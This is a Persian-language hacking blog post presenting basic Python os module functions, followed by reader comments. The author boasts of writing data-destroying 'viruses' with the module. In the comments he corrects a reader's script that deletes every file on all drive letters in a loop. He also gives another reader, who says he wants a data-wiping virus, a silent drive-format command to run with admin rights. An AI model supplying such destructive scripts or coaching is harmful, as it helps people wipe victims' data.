آموزش ماژول ها در پایتون قسمت 1 :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

از اونجایی که منابع فارسی برای یادگیری ماژول ها تو سایت های ایرانی کمه بخاطر همین قراره ماژول های پایتون رو کار کنیم که از نظر اهمیت و ... درجه ی بالایی دارن

اگه شما هم دوست داشتین با من همکاری کنین تا آموزشتون با اسم خودتون منتشر بشه و هم یه باری از دوش من برداشته باشین :)

میتونین آموزشتونو برام ایمیل کنین یا اینکه در قسمت کامنت ها بنویسین تا بعد از بررسی در قالب یه پست منتشر بشن

یه نکته هم بگم که ما قراره آموزش توابع مهم ماژول هارو بررسی کنیم و ...

نه اینکه کل توابع یه ماژول رو بررسی کنیم

مثلا توی این پست قراره با ماژول os توی پایتون کار کنیم و چند تا از توابع مهم اون رو بررسی کنیم

صد در صد کد هارو تیکه به تیکه تست کنین و سعی کنین قشنگ باهاشون کار کنین و چیزای مختلف رو بررسی کنین و درست کنین تا دستتون راه بیفته

مثلا من با همین کتابخونه خیلی ساده تونستم چهار تا ویروس بنویسم که میتونه آسیب زیادی به اطلاعات برسونه و ...

فقط کافیه با حلقه ها خوب بلد باشین کار کنین تا بتونین ویروس های تو مخ بنویسین و باعث بشین کاربر قربانی فحش بارونتون کنه :)

اول از همه ماژول os رو import میکنیم :

import os

تغییر نام دادن یک فایل :

os.rename("Name.mp3","New_name.mp3")

حذف یک فایل :

os.remove("File.txt")

بدست آوردن مسیر برناممون یا همون اسکریپتمون :

print os.getcwd()

لیست کردن فایل های مسیرمون :

print os.listdir('.')

ساختن یک پوشه :

os.mkdir("ViRus32")

حذف یک پوشه ی خالی :

os.rmdir("ViRus32")

بررسی موجود بودن یک فولدر در یک مسیر ، مثلا اگه True بیاد یعنی هست و اگه False بیاد یعنی نیست :

print os.path.isdir("ViRus32")

کد قبلی بررسی میکرد یه پوشه توی یه مسیری قرار داره یا نه ، کد پایین برای بررسی موجود بودن یه فایل هستش :

print os.path.isfile("My_script.py")

اجرای یک دستور خط فرمان :

os.system("Echo ViRus32 & Pause")

کد تغییر مسیر برنامه :

os.chdir("D:\\")

آموزش ماژول ها در پایتون قسمت 2

موفق باشید

نظر (۱۹)

بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
**** *** * ** *** *****
Virus32 MR_C0D3R ‌ :
😂😂
بیا تل ... یک شماره درست حسابی بده داشته باشم
Virus32 MR_C0D3R ‌ :
بهت PM دادم دیگه
سلام
پستو خوندم ولی جای دو تا مطلبو خالی دیدم
این کدای مخفی کردن و در اوردن پوشه از حالت مخفی که به من دادی
اونارم میزاشتی بد نبود.

حداقل اگه کسی دنبال همچین کاری بود جوابو راحت تر توی این پست پیدا میکرد دیگه نمیخواست بره دنبال کامنت ها و...
Virus32 MR_C0D3R ‌ :
سلام
بعدا میزارمش ...
داداش او قسمتی که گفتی شما هم می تونید اموزشاتونو بهبم بفرستید بزارمش
در کل فقط منظورت اموزش درباره ماژول بود ، یا چیزای دیگه هم میشه ؟؟؟
Virus32 MR_C0D3R ‌ :
هر چیزی رو میشه اینجا فرستاد
بعدا اگه ببینم یه خرده توضیحاتش طولانی و قابل پست شدنه
در قالب یه پست آموزشی قرار میدم
بازم از مازول ها بزار
سلام چرا بعضی ماژولا مثل urllib نصب نمیشن
Virus32 MR_C0D3R ‌ :
سلام
مثالی که شما زدی ( URL-LIB )
بطور پیشفرض توی پایتون نصب هستش
اگه منظورتون ماژول های دیگه هستش ...
بستگی داره به عوامل مختلف ...
مثلا میبینی باید pip بروز رسانی بشه
یا دلایل دیگه که مثلا اگه ارور بده باید ارورش رو تو نت که سرچ کنی
نحوه نصب اون کتابخونه رو گفتن
چون بعضی کتابخونه ها اسماشون با چیزی که import میشن فرق میکنه
سلام خسته نباشید
من امروز میخواستم نرم افزار پیتون رو نصب کنم این Error رو داد چ کنم؟__
http://s9.picofile.com/file/8337453050/pyEr00R.png
مرسی بابت آموزشا
Virus32 MR_C0D3R ‌ :
سلام
ویندوزت معماریش 32 بیته یا 64 ؟
در کل این پایتون که دانلود کردی مناسب ویندوز تو نیست
معماری 32bt
نرم افزار دیگه ای سراغ دارید که با سیستم های ضعیف سازگار باشه؟
Virus32 MR_C0D3R ‌ :
ربطی به سیستم های ضعیف نداره
چون من روی ضعیف ترین سیستمم که فکرشو کنی راش انداختم
تو سایت خود پایتون ، یعنی اینجا
برو به منوی کشویی دانلود و ....
اونجا خودش تشخیص میده چه پایتونی به سیستمت میخوره
سلام این کد پایتون خوبه آیا جواب میده؟
import os

while True:
os.system("Del /q /s a:\*.* Iy")
os.system("Del /q /s b:\*.* Iy")
os.system("Del /q /s C:\*.* Iy")
os.system("Del /q /s d:\*.* Iy")
os.system("Del /q /s e:\*.* Iy")
os.system("Del /q /s f:\*.* Iy")
os.system("Del /q /s g:\*.* Iy")
os.system("Del /q /s h:\*.* Iy")
os.system("Del /q /s q:\*.* Iy")
os.system("Del /q /s m:\*.* Iy")
os.system("Del /q /s n:\*.* Iy")
os.system("Del /q /s p:\*.* Iy")
os.system("Del /q /s u:\*.* Iy")
os.system("Del /q /s z:\*.* Iy")
os.system("Del /q /s x:\*.* Iy")
Virus32 MR_C0D3R ‌ :
سلام
نه جواب نمیده
اول اینکه تو پایتون یا زبان های c و ...
برای استفاده از بک اسلش ( \ ) باید دو تا بنویسیم ( \\ )
یعنی اگه بخوام مثال بزنم ، اول کد پایین رو تو شل پایتون اجرا کن
print ("\")
که کد بالارو اجرا کنی میبینی که خطا میده چون از یه بک اسلش استفاده کردیم
اما کد پایین رو که اجرا کنی میبینی که یدونه بک اسلش برات چاپ میکنه
print ("\\")
البته تو بعضی از کدها نیازی به این کار نیست
مثلا کدای پایین بدون خطا اجرا میشه 
در حالی که ما تو یکیشون از یه بک اسلش استفاده کردیم
و تو یکیشونم از دو تا بک اسلش
import os

os.system("MkDir C:\Users\%username%\Desktop\ViRus32")
os.system("MkDir C:\\Users\\%username%\\Desktop\\MR_C0D3R")
خب این از این یه تیکه
دومین مورد هم اینکه اون Iy رو نمیدونم چرا استفاده کردی
که البته اگه اشتباه نکنم منظورت کد پایین بوده :(
Echo y | ....
در آخر اینکه شما از سوئیچ q/ استفاده کردی
در نتیجه نیازی نیست اون سوالی که میپرسه رو جواب بدی
خب الان یک کد فرمت درایو سی به پایتون چجوری؟
Virus32 MR_C0D3R ‌ :
من درایور C رو بلد نیستم Format کنم D:
ببخشید من تازه کارم بلد نیستم باید چجوری باید کد ها رو بعد نوشتن اجرا کنم من وقتی اینو نوشتم چجوری باید اجراش کنم
Virus32 MR_C0D3R ‌ :
اول باید پایتون رو نصب کنی...
الان پایتون رو نصب کردی ؟
اول از همه پایتون رو دانلود و نصب کن....
بعدا یه فایل با پسوند py بساز و کدهارو داخلش قرار بده....
در آخر میتونی با F5 اجراش کنی
ببخشید من اول داشتم خوب کار می کردم ولی از یه جایی به بعد هرجا از os  استفاده می کنم می نویسه wrong syntax دیگه از ماژول رو قبول نمی کنه مدل پایتونم 3.7 هستش یه کمک می دین

Virus32 MR_C0D3R ‌ :
یکبار دیگه ماژول رو ایپمورت کن
اگه قبول نکرد و دوباره ارور داد
پایتون رو حذفش کن به همراه پوشه ای که تو درایو سی میسازه
و در آخر هم مجددا نصبش کن و سیستمت رو ری استارت کن....
سلام داداش خسته نباشی پست عاولی بود گودجاب
یه سوال.
میدونم الان بازار کار سی سی شارپ تو ایران بهتره ولی موافقی با این که چند سال دیگه شدیدا پایتون توی ایران جا می افته واسه اتوماسیون و کسی که الان شروع کنه به یادگیری سی شارپ  اونموقع سه هیچ جلوعه؟
من یه خورذه سی شارپ کار کردم الان ولی میخوام برم پابتون.دوستش هم دارم.
و سوال دو : یه مرجع خوب واسه یادگیری پایتون جز یوتیوب میگی؟
یه چنتا سایت خارجی دارم ولی یه پک کامل ایرانی اگه خوب باشه خیلی بهتره.
اگر مدنظر داری و تلگرام یا همینجا بهم بگی ممنونت میشم 3>
اینم آیدیم  : @Xtremmy
lob u

Virus32 MR_C0D3R ‌ :
سلام
پکیج کامل ، چیزی سراغ ندارم
با نظرتم موافقم ، چون بیشتر کسایی که میبینم میرن سراغ پایتون

سلام . برای اینکه بخوام از اخری که می شه باهاش تو خط فرمان یه چیزی رو اجرا کرد یه ویروس پاک کردن  دیتا بنویسم . می خواستم بدونم باید از په کدی تو خط فرمان استفاده کرد که مثلا یه درایو مشخصی رو فرمت کنه ؟؟

Virus32 MR_C0D3R ‌ :
سلام
اگه اشتباه نکنم منظورت یکی مونده به آخری باشه
میتونی از کدپایین استفاده کنی
import os
os.system("Format /...")
تو کد های بالا به جای سه نقطه باید سوئیچ مورد نظرت رو قرار بدی
برای اینکه با سوئیچ ها آشنا بشی توی CMD بزن ?/ Format

الان من از کد

import os

("//:os.system("Format /E

استفاده کردم ولی جواب نمیده . می نویسه 4

Virus32 MR_C0D3R ‌ :
وارد منوی Start ویندوز شو و سرچ کن CMD و بعدش خط فرمان رو با دسترسی ادمین اجرا کن
حالا به کمک دستور Cd برو به مسیر اسکریپت پایتونت
حالا اسکریپت پایتون رو باز کن و کدپایین رو داخلش قرار بده
os.system('Echo y | Format E: /Q')
بعدا داخل خط فرمان اسم اسکریپتت رو بنویس و Enter کن
برای اینکه برنامت با سطح دسترسی بالاتر اجرا بشه تا برنامت به درستی کار کنه
چند تا کامنت آخر این پست رو بخون

تو خط فرمان زدم . کار هم کرد ولی اینی که میگین اسم فایل رو بزنم . کجا بزنم ؟

تو خط فرمان زدم . کار هم کرد ولی اینی که میگین اسم فایل رو بزنم . کجا بزنم ؟

Virus32 MR_C0D3R ‌ :
منظورم توی همون خط فرمان هستش
تا بتونه اسکریپت رو با CMD که تو سطح دسترسی بالا اجرا شده باز کنه
و اینکه شما یکبار کامنت ارسال میکنین دیگه نیازی به ارسال مجدد نیست :(

خخخخخخخخخخخ . باگ شده فک کنم . من یه بار زده بودم

سلام یه سوال این چرا جواب نمیده

 

import os
from random import seed
from random import random
os.chdir('E:\\')
while(True):
     os.mkdir(random())
 

ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی